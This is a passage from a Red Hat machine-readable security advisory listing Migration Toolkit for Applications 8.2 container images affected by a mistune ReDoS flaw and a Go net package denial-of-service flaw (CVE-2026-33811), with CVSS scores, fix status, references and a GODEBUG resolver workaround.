"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "mistune: Mistune: Regular Expression Denial of Service (ReDoS) via crafted Markdown input"
},
{
"cve": "CVE-2026-33811",
"cwe": {
"id": "CWE-1341",
"name": "Multiple Releases of Same Resource or Handle"
},
"discovery_date": "2026-05-07T20:01:34.913869+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2467822"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the `net` package of Go (golang), specifically when using the `LookupCNAME` function with the `cgo` DNS resolver. A remote attacker could exploit this by providing a very long Canonical Name (CNAME) response. This can trigger a double-free of C memory, leading to a crash and a Denial of Service (DoS) for the affected application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "net: golang: Go net package: Denial of Service via long CNAME response in LookupCNAME",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in the Go `net` package, affecting applications configured to use the `cgo` DNS resolver. A remote attacker could trigger a double-free memory error by providing a very long CNAME response, leading to a crash of the vulnerable application and impacting service availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33811"
},
{
"category": "external",
"summary": "RHBZ#2467822",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467822"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33811",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33811"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33811",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33811"
},
{
"category": "external",
"summary": "https://go.dev/cl/767860",
"url": "https://go.dev/cl/767860"
},
{
"category": "external",
"summary": "https://go.dev/issue/78803",
"url": "https://go.dev/issue/78803"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M",
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4981",
"url": "https://pkg.go.dev/vuln/GO-2026-4981"
}
],
"release_date": "2026-05-07T19:41:19.285000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "To mitigate this issue, applications can be configured to use the pure Go DNS resolver instead of the `cgo` DNS resolver. This can be achieved by setting the `GODEBUG` environment variable to `netdns=go`. For example, to run a Go application with this mitigation: `GODEBUG=netdns=go /path/to/your/go/application`. This change may require restarting affected applications or services to take effect. Users should verify that this change does not negatively impact DNS resolution for their specific application environment.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
